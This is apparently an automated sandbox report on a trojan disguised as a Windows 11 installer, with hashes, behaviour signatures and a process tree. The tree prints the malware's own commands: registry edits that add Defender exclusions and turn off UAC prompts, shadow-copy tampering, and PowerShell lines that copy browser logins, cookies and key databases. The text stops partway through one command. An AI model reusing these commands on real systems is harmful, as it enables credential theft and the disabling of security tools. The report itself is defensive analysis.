Analysis
max time kernel: 150s
max time network: 140s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 14-11-2024 23:57
Static task: static1
Behavioral task: behavioral1 (Sample: Trojan.Win32.DelShad.exe, Resource: win7-20240903-en)
Behavioral task: behavioral2 (Sample: Trojan.Win32.DelShad.exe, Resource: win10v2004-20241007-en)
Behavioral task: behavioral3 (Sample: Trojan.Win32.DelShad.exe, Resource: win10ltsc2021-20241023-en)
Behavioral task: behavioral4 (Sample: Trojan.Win32.DelShad.exe, Resource: win11-20241007-en)
General
Target: Trojan.Win32.DelShad.exe
Size: 30.2MB
MD5: 52cc1d2fbc403848c18f3c95dd63d727
SHA1: 9c5067b86ffc4ab6908aea7d9adf0b82353db3af
SHA256: a9883030a711aebd2ec7faff0091135ee590a0e6ac613a963f55e43edc00c595
SHA512: 7e59c7ae07bca570ce162633cfac5817bc6f012168afa3a24def0c95fef3c3251648a560761e9d967db36b31e437dbd2ed2ac884d62d4c4ee61a808a830754a0
SSDEEP: 393216:jQV5xOYevAex37XtjUIahEeBLQV5xOYevAex37XtjUIahEeBLQV5xOYevAex37Xq:cj8579oIIaj8579oIIaj8579oIIF
Malware Config
Signatures
Processes:
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\WIndoWs defender sECuritY centEr\notIFICATions | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\WIndoWs defender sECuritY centEr\notIFICATions\dIsablEEnhAncEdnOtiFiCatiOns = "1" | reg.exe
Key created | \REGISTRY\MACHINE\sOFTwAre\micrOsOfT\WIndoWs defender sECuritY centEr\notIFICATions | reg.exe
Processes:
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\COnsenTPrompTbEhAvIoradmin = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\COnsEnTPromptbehavIOrUser = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromPTOnsECUredesKtoP = "0" | reg.exe
Processes:
description | ioc | Process
Key created | \REGISTRY\MACHINE\sOFTWArE\mIcrOsofT\WindoWS dEFEndEr\ExClUsions\ExTEnSIOns | rEg.EXE
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\ExclUSiOnS\EXTENsiONs\Cmd = "0" | rEg.EXE
Key created | \REGISTRY\MACHINE\SofTWArE\mIcrosOfT\windOwS dEfENdEr\EXClUSiOnS\ExtEnSIOns | rEg.EXE
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\ExclUSiOnS\EXTENsiONs\EXE = "0" | rEg.EXE
Key created | \REGISTRY\MACHINE\soFtwarE\mIcroSoFT\WINdows dEfEndEr\ExclUSiOnS\EXTENsiONs | rEG.EXE
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\ExclUSiOnS\EXTENsiONs | rEG.EXE
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\ExclUSiOnS\EXTENsiONs\SCr = "0" | rEG.EXE
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
Disables use of System Restore points 1 TTPs
Drops file in Drivers directory 1 IoCs
Processes:
description | ioc | Process
File opened for modification | C:\Windows\system32\drivers\etc\hosts | cmd.exe
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Windows11InstaIIation.sCr
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | Windows11InstaIIation.sCr
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation | Trojan.Win32.DelShad.tmp
Key value queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation | WScript.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation | Windows11InstaIIation.sCr
Drops startup file 1 IoCs
Processes:
description | ioc | Process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows11InstallationAssistant.lnk | Trojan.Win32.DelShad.tmp
Executes dropped EXE 17 IoCs
Processes:
pid | Process
944 | Trojan.Win32.DelShad.tmp
4104 | Trojan.Win32.DelShad.tmp
4212 | pik.exe
5020 | rp.exe
4232 | rp.exe
4056 | rp.exe
1844 | rp.exe
1180 | rp.exe
3720 | rp.exe
4968 | rp.exe
1636 | rp.exe
1812 | rp.exe
4856 | rp.exe
4208 | rp.exe
4628 | rp.exe
2516 | Windows11InstaIIation.scr
1500 | Windows11InstaIIation.sCr
Modifies file permissions 1 TTPs 2 IoCs
Processes:
pid | Process
1880 | icacls.exe
4060 | icacls.exe
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow | ioc
19 | ipINFO.io
Suspicious use of SetThreadContext 1 IoCs
Processes:
description | pid | Process | procid_target
PID 2516 set thread context of 1500 | 2516 | Windows11InstaIIation.scr | 193
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery 1 TTPs 24 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes:
pid | Process
3816 | find.exe
832 | find.exe
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
description | ioc | Process
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | Windows11InstaIIation.sCr
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | Windows11InstaIIation.sCr
Enumerates system info in registry 2 TTPs 5 IoCs
Processes:
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | Windows11InstaIIation.sCr
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion | Windows11InstaIIation.sCr
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BIOSVersion | Windows11InstaIIation.sCr
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | Windows11InstaIIation.sCr
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | Windows11InstaIIation.sCr
Interacts with shadow copies 3 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
pid | Process
1624 | vssadmin.exe
Kills process with taskkill 1 IoCs
Processes:
pid | Process
2940 | taskkill.exe
Modifies data under HKEY_USERS 20 IoCs
Suspicious behavior: EnumeratesProcesses 58 IoCs
Suspicious use of AdjustPrivilegeToken 64 IoCs
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
pid | Process
4104 | Trojan.Win32.DelShad.tmp
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
pid | Process
2516 | Windows11InstaIIation.scr
Suspicious use of WriteProcessMemory 64 IoCs
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
Level 1: C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe"
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID: 4544
  Level 2: C:\Users\Admin\AppData\Local\Temp\is-EJVTG.tmp\Trojan.Win32.DelShad.tmp
    Command line: "C:\Users\Admin\AppData\Local\Temp\is-EJVTG.tmp\Trojan.Win32.DelShad.tmp" /SL5="$70050,9723063,876544,C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe"
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID: 944
    Level 3: C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe" /verysilent /sp-
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory
      PID: 2388
      Level 4: C:\Users\Admin\AppData\Local\Temp\is-HIRIH.tmp\Trojan.Win32.DelShad.tmp
        Command line: "C:\Users\Admin\AppData\Local\Temp\is-HIRIH.tmp\Trojan.Win32.DelShad.tmp" /SL5="$80050,9723063,876544,C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe" /verysilent /sp-
        - Drops startup file
        - Executes dropped EXE
        - System Location Discovery: System Language Discovery
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of FindShellTrayWindow
        - Suspicious use of WriteProcessMemory
        PID: 4104
        Level 5: C:\Windows\SysWOW64\taskkill.exe
          Command line: "C:\Windows\system32\taskkill.exe" /f /im "Windows11InstaIIation.scr"
          - System Location Discovery: System Language Discovery
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
          PID: 2940
        Level 5: C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\pik.exe
          Command line: "C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\pik.exe"
          - Executes dropped EXE
          - Suspicious use of AdjustPrivilegeToken
          PID: 4212
        Level 5: C:\Windows\SysWOW64\cmd.exe
          Command line: "C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\.cmd""
          - System Location Discovery: System Language Discovery
          PID: 2612
          Level 6: C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe
            Command line: rp.EXE /sw:0 rEG.EXE add "hklM\soFtwarE\mIcroSoFT\WINdows dEfEndEr\ExclUSiOnS\EXTENsiONs" /V SCr /T rEG_dWOrd /d 0 /F
            - Executes dropped EXE
            - System Location Discovery: System Language Discovery
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            PID: 5020
            Level 7: C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe
              Command line: "C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe" /sw:0 rEG.EXE add "hklM\soFtwarE\mIcroSoFT\WINdows dEfEndEr\ExclUSiOnS\EXTENsiONs" /V SCr /T rEG_dWOrd /d 0 /F
              - Executes dropped EXE
              - System Location Discovery: System Language Discovery
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken
              PID: 4232
              Level 8: C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe
                Command line: "C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe" /TI/ /sw:0 rEG.EXE add "hklM\soFtwarE\mIcroSoFT\WINdows dEfEndEr\ExclUSiOnS\EXTENsiONs" /V SCr /T rEG_dWOrd /d 0 /F
                - Executes dropped EXE
                - System Location Discovery: System Language Discovery
                - Modifies data under HKEY_USERS
                PID: 1180
                Level 9: C:\Windows\system32\rEG.EXE
                  Command line: "C:\Windows\system32\rEG.EXE" add "hklM\soFtwarE\mIcroSoFT\WINdows dEfEndEr\ExclUSiOnS\EXTENsiONs" /V SCr /T rEG_dWOrd /d 0 /F
                  - Windows security bypass
                  PID: 3540
          Level 6: C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe
            Command line: rP.EXE /sW:0 rEg.EXE Add "hKLM\sOFTWArE\mIcrOsofT\WindoWS dEFEndEr\ExClUsions\ExTEnSIOns" /V Cmd /T rEg_dword /d 0 /f
            - Executes dropped EXE
            - System Location Discovery: System Language Discovery
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            PID: 4056
            Level 7: C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe
              Command line: "C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe" /sW:0 rEg.EXE Add "hKLM\sOFTWArE\mIcrOsofT\WindoWS dEFEndEr\ExClUsions\ExTEnSIOns" /V Cmd /T rEg_dword /d 0 /f
              - Executes dropped EXE
              - System Location Discovery: System Language Discovery
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken
              PID: 1844
              Level 8: C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe
                Command line: "C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe" /TI/ /sW:0 rEg.EXE Add "hKLM\sOFTWArE\mIcrOsofT\WindoWS dEFEndEr\ExClUsions\ExTEnSIOns" /V Cmd /T rEg_dword /d 0 /f
                - Executes dropped EXE
                - System Location Discovery: System Language Discovery
                - Modifies data under HKEY_USERS
                PID: 4968
                Level 9: C:\Windows\system32\rEg.EXE
                  Command line: "C:\Windows\system32\rEg.EXE" Add "hKLM\sOFTWArE\mIcrOsofT\WindoWS dEFEndEr\ExClUsions\ExTEnSIOns" /V Cmd /T rEg_dword /d 0 /f
                  - Windows security bypass
                  PID: 4476
          Level 6: C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe
            Command line: rP.EXE /SW:0 rEg.EXE Add "hKlm\SofTWArE\mIcrosOfT\windOwS dEfENdEr\EXClUSiOnS\ExtEnSIOns" /V EXE /t rEg_dwOrd /d 0 /F
            - Executes dropped EXE
            - System Location Discovery: System Language Discovery
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            PID: 3720
            Level 7: C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe
              Command line: "C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe" /SW:0 rEg.EXE Add "hKlm\SofTWArE\mIcrosOfT\windOwS dEfENdEr\EXClUSiOnS\ExtEnSIOns" /V EXE /t rEg_dwOrd /d 0 /F
              - Executes dropped EXE
              - System Location Discovery: System Language Discovery
              - Suspicious behavior: EnumeratesProcesses
              PID: 1636
              Level 8: C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe
                Command line: "C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe" /TI/ /SW:0 rEg.EXE Add "hKlm\SofTWArE\mIcrosOfT\windOwS dEfENdEr\EXClUSiOnS\ExtEnSIOns" /V EXE /t rEg_dwOrd /d 0 /F
                - Executes dropped EXE
                - System Location Discovery: System Language Discovery
                - Modifies data under HKEY_USERS
                PID: 4856
                Level 9: C:\Windows\system32\rEg.EXE
                  Command line: "C:\Windows\system32\rEg.EXE" Add "hKlm\SofTWArE\mIcrosOfT\windOwS dEfENdEr\EXClUSiOnS\ExtEnSIOns" /V EXE /t rEg_dwOrd /d 0 /F
                  - Windows security bypass
                  PID: 3444
          Level 6: C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe
            Command line: rp.EXE /Sw:0 rEG.EXE Add "hklM\SoftwarE\MicroSOfT\windoWS dEfENdEr" /v pUAProTECTiOn /t rEG_dWOrd /d 0 /f
            - Executes dropped EXE
            - System Location Discovery: System Language Discovery
            - Suspicious behavior: EnumeratesProcesses
            PID: 1812
            Level 7: C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe
              Command line: "C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe" /Sw:0 rEG.EXE Add "hklM\SoftwarE\MicroSOfT\windoWS dEfENdEr" /v pUAProTECTiOn /t rEG_dWOrd /d 0 /f
              - Executes dropped EXE
              - System Location Discovery: System Language Discovery
              - Suspicious behavior: EnumeratesProcesses
              PID: 4208
              Level 8: C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe
                Command line: "C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe" /TI/ /Sw:0 rEG.EXE Add "hklM\SoftwarE\MicroSOfT\windoWS dEfENdEr" /v pUAProTECTiOn /t rEG_dWOrd /d 0 /f
                - Executes dropped EXE
                - System Location Discovery: System Language Discovery
                - Modifies data under HKEY_USERS
                PID: 4628
                Level 9: C:\Windows\system32\rEG.EXE
                  Command line: "C:\Windows\system32\rEG.EXE" Add "hklM\SoftwarE\MicroSOfT\windoWS dEfENdEr" /v pUAProTECTiOn /t rEG_dWOrd /d 0 /f
                  PID: 2012
        Level 5: C:\Windows\SysWOW64\cmd.exe
          Command line: "C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\.cmd""
          - System Location Discovery: System Language Discovery
          PID: 4232
          Level 6: C:\Windows\SysWOW64\cmd.exe
            Command line: C:\Windows\system32\cmd.exe /c CUrL -S ipINFO.io/Ip
            - System Location Discovery: System Language Discovery
            PID: 2112
            Level 7: C:\Windows\SysWOW64\curl.exe
              Command line: CUrL -S ipINFO.io/Ip
              - System Location Discovery: System Language Discovery
              PID: 4220
        Level 5: C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.scr
          Command line: "C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.scr"
          - Executes dropped EXE
          - Suspicious use of SetThreadContext
          - System Location Discovery: System Language Discovery
          - Suspicious use of SetWindowsHookEx
          PID: 2516
          Level 6: C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr
            Command line: "C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr"
            - Checks BIOS information in registry
            - Checks computer location settings
            - Executes dropped EXE
            - System Location Discovery: System Language Discovery
            - Checks processor information in registry
            - Enumerates system info in registry
            PID: 1500
            Level 7: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/43mkyhds.Admin\logins.json\" \"C:\Users\Admin\AppData\Local\Temp\otu1nf8f1aiuixcc240662078.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/43mkyhds.Admin\key3.db\" \"C:\Users\Admin\AppData\Local\Temp\t9h98yemuyztdw240662078.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/43mkyhds.Admin\key4.db\" \"C:\Users\Admin\AppData\Local\Temp\daa28abfmq5240662078.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/43mkyhds.Admin\cert9.db\" \"C:\Users\Admin\AppData\Local\Temp\tj1lvkk7k240662078.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/43mkyhds.Admin\prefs.js\" \"C:\Users\Admin\AppData\Local\Temp\eyoc8n14idxv240662078.tmp\" -Force"
              - Suspicious behavior: EnumeratesProcesses
              PID: 3720
            Level 7: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/43mkyhds.Admin\formhistory.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\5b3nneef5a1240677406.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/43mkyhds.Admin\cookies.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\8l46la0gojeru240677406.tmp\" -Force"
              - Suspicious behavior: EnumeratesProcesses
              PID: 3836
            Level 7: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/7fmsgkth.default-release\logins.json\" \"C:\Users\Admin\AppData\Local\Temp\ohs8a31fx4mtk240699406.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/7fmsgkth.default-release\key3.db\" \"C:\Users\Admin\AppData\Local\Temp\61mtomzkbt02ht1240699406.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/7fmsgkth.default-release\key4.db\" \"C:\Users\Admin\AppData\Local\Temp\qtc9j1wbnrqd240699406.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/7fmsgkth.default-release\cert9.db\" \"C:\Users\Admin\AppData\Local\Temp\4l3szsqpghx240699406.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/7fmsgkth.default-release\prefs.js\" \"C:\Users\Admin\AppData\Local\Temp\s0g722c9e4j4ta1w240699406.tmp\" -Force"
              - Suspicious behavior: EnumeratesProcesses
              PID: 4168
            Level 7: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/7fmsgkth.default-release\formhistory.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\ru85pw6tqsjob9j240705343.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/7fmsgkth.default-release\cookies.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\kbvc7t58g7u3ky240705343.tmp\" -Force"
              - Suspicious behavior: EnumeratesProcesses
              PID: 1552
            Level 7: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/43mkyhds.Admin\logins.json\" \"C:\Users\Admin\AppData\Local\Temp\eh3f6tu9lk240710578.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/43mkyhds.Admin\key3.db\" \"C:\Users\Admin\AppData\Local\Temp\ntt3qcho6f240710578.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/43mkyhds.Admin\key4.db\" \"C:\Users\Admin\AppData\Local\Temp\xrk0ql2wlekasq240710578.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/43mkyhds.Admin\cert9.db\" \"C:\Users\Admin\AppData\Local\Temp\1l01qph8240710578.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/43mkyhds.Admin\prefs.js\" \"C:\Users\Admin\AppData\Local\Temp\glwg4n1s240710578.tmp\" -Force"
              - Suspicious behavior: EnumeratesProcesses
              PID: 1680
            Level 7: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/43mkyhds.Admin\formhistory.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\3hcz52mjwq240719546.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/43mkyhds.Admin\cookies.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\y88z1j32vusu172m240719546.tmp\" -Force"
              - Suspicious behavior: EnumeratesProcesses
              PID: 1568
            Level 7: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/7fmsgkth.default-release\logins.json\" \"C:\Users\Admin\AppData\Local\Temp\8yuq9a72u6m1wcn240728109.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/7fmsgkth.default-release\key3.db\" \"C:\Users\Admin\AppData\Local\Temp\t4z4yu15iu595z240728109.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/7fmsgkth.default-release\key4.db\" \"C:\Users\Admin\AppData\Local\Temp\5koqj2nxry240728109.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/7fmsgkth.default-release\cert9.db\" \"C:\Users\Admin\AppData\Local\Temp\58tds0jd240728109.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/7fmsgkth.default-release\prefs.js\" \"C:\Users\Admin\AppData\Local\Temp\rz2ryztw8p3240728109.tmp\" -Force"
              - Suspicious behavior: EnumeratesProcesses
              PID: 3640
            Level 7: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/7fmsgkth.default-release\formhistory.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\22zcsr95n0240734140.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/7fmsgkth.default-release\cookies.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\613ouc67y2mn36240734140.tmp\" -Force"
- Suspicious behavior: EnumeratesProcesses
PID:2624
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Local\Google\Chrome\user Data\Default\Login Data\" \"C:\Users\Admin\AppData\Local\Temp\i9ovez9w3s3240740437.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\Google\Chrome\user Data\Default\Web Data\" \"C:\Users\Admin\AppData\Local\Temp\44a6tcmrfbdc5240740437.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\Google\Chrome\user Data\Default\Network\Cookies\" \"C:\Users\Admin\AppData\Local\Temp\0mp2sm4y240740531.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\Google\Chrome\user Data\Default\..\Local State\" \"C:\Users\Admin\AppData\Local\Temp\8fkndkl8m240740531.tmp\" -Force"7⤵
- Suspicious behavior: EnumeratesProcesses
PID:4380
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Local\Microsoft\edge\user Data\Default\Login Data\" \"C:\Users\Admin\AppData\Local\Temp\yaz0qkm4r81lkx240754171.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\Microsoft\edge\user Data\Default\Web Data\" \"C:\Users\Admin\AppData\Local\Temp\gu51pkiwl2r9240754171.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\Microsoft\edge\user Data\Default\Cookies\" \"C:\Users\Admin\AppData\Local\Temp\6t7u44zsw7k4i99240754265.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\Microsoft\edge\user Data\Default\..\Local State\" \"C:\Users\Admin\AppData\Local\Temp\ku2vwbo3c33240754265.tmp\" -Force"7⤵
- Suspicious behavior: EnumeratesProcesses
PID:1836
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\Desktop\BlockUse.temp\" \"C:\Users\Admin\AppData\Local\Temp\fmxfkx2joq6ublbyu8yv.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\CheckpointEnter.hta\" \"C:\Users\Admin\AppData\Local\Temp\g8hku1jq3xo4li210huykb.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\CompressConfirm.aiff\" \"C:\Users\Admin\AppData\Local\Temp\f06htrgpgf0ohtgj5rgy3k.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\ConvertMerge.vsd\" \"C:\Users\Admin\AppData\Local\Temp\6l9b9kap2qesbbxrepr.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\DisableExport.rm\" \"C:\Users\Admin\AppData\Local\Temp\qijdw58b9daul52l035mwzlma61m1pkx.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\EnableHide.clr\" \"C:\Users\Admin\AppData\Local\Temp\a4e9fv6a6tsuzj1ik.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\EnterInitialize.vbe\" \"C:\Users\Admin\AppData\Local\Temp\vuqevmn7ikzd8qgl0cqknqdifrro5.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\FindSplit.emz\" \"C:\Users\Admin\AppData\Local\Temp\6qtn8jrhn2szxgf4x0flac5t5c.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\LimitSubmit.docx\" \"C:\Users\Admin\AppData\Local\Temp\2qj9ludo0g3451xxnp7mveo5c8e.tmp\" -Force;cpi 